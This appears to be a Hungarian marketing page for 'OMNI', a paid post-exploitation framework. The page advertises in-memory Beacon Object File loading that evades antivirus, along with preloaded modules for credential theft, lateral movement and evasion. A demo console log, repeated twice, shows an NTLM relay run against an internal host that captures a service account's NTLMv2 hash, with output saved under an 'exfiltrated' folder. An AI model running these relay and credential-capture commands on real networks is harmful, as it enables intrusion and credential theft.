English
Magyar
OMNI Funkció
Beacon Object Files —
Memóriában futó post-exploitation, lemezérintés nélkül
A BOF-ok COFF x86_64 objektumként töltődnek be közvetlenül az agent folyamatába — semmi sem kerül lemezre, nem jön létre új folyamat, nincs lemezen PE aláírás amelyet a vírusirtó egyeztethetne. Az OMNI 106 TrustedSec BOF-ot tartalmaz előre betöltve: credential hozzáférés, host felsorolás, oldalsó mozgás, védelemkitérés. Egyéni BOF-ok a Web UI-ból tölthetők fel szerver hozzáférés nélkül.
105+
előre betöltött BOF
Credentials
Felsorolás
Oldalsó mozgás
Kitérés
Technikai specifikációk
- Teljes COFF x86_64 parser és betöltő
- Module stomping + double-map végrehajtás
- Teljes Beacon API kompatibilitás
- Nincs lemezírás, nincs új folyamat
- Egyéni BOF feltöltés Web UI-ból drag-and-drop
- Az összes nyilvános TrustedSec BOF-fal kompatibilis
Fedezze fel a többi funkciót
Használja a BOF Betöltőt-t a következő megbízásán
Minden OMNI csomagban benne van — $200/hótól. 7 napos visszatérítési garancia.
Élő demo
[OMNI]❯[DEMO]❯[CORP-WS-042]» !bof whoami.x64
[*] BOF válaszra várakozás (Timeout: 60s)...
[+] Válasz: CORP-WS-042:
Felhasználó : CORP\jsmith
Domain : CORP
Bejelentkezés: Interactive
Csoportok : Domain Users, Remote Desktop Users, Developers
Jogosultságok: SeChangeNotifyPrivilege, SeUndockPrivilege
└─ Mentve: exfiltrated/CORP-WS-042/demo/bof/whoami_[demo].txt
[+] Parancs sikeresen végrehajtva
[OMNI]❯[DEMO]❯[CORP-WS-042]» !bof upload --path /opt/omni/bof/custom/ntlm_relay.x64.o
[*] Egyedi BOF feltöltése: ntlm_relay.x64.o (18.4 KB)...
[+] BOF sikeresen feltöltve és regisztrálva
[OMNI]❯[DEMO]❯[CORP-WS-042]» !bof ntlm_relay.x64 --target 10.10.20.5 --port 445
[*] BOF végrehajtása a beacon szálban (in-process)...
[+] NTLM relay listener elindítva a 8445-ös porton
[+] Autentikációs események figyelése...
[!] NTLMv2 hash rögzítve: CORP\svc_sql::CORP:[demo-hash-kihagyva]
[+] Parancs sikeresen végrehajtva
[*] BOF válaszra várakozás (Timeout: 60s)...
[+] Válasz: CORP-WS-042:
Felhasználó : CORP\jsmith
Domain : CORP
Bejelentkezés: Interactive
Csoportok : Domain Users, Remote Desktop Users, Developers
Jogosultságok: SeChangeNotifyPrivilege, SeUndockPrivilege
└─ Mentve: exfiltrated/CORP-WS-042/demo/bof/whoami_[demo].txt
[+] Parancs sikeresen végrehajtva
[OMNI]❯[DEMO]❯[CORP-WS-042]» !bof upload --path /opt/omni/bof/custom/ntlm_relay.x64.o
[*] Egyedi BOF feltöltése: ntlm_relay.x64.o (18.4 KB)...
[+] BOF sikeresen feltöltve és regisztrálva
[OMNI]❯[DEMO]❯[CORP-WS-042]» !bof ntlm_relay.x64 --target 10.10.20.5 --port 445
[*] BOF végrehajtása a beacon szálban (in-process)...
[+] NTLM relay listener elindítva a 8445-ös porton
[+] Autentikációs események figyelése...
[!] NTLMv2 hash rögzítve: CORP\svc_sql::CORP:[demo-hash-kihagyva]
[+] Parancs sikeresen végrehajtva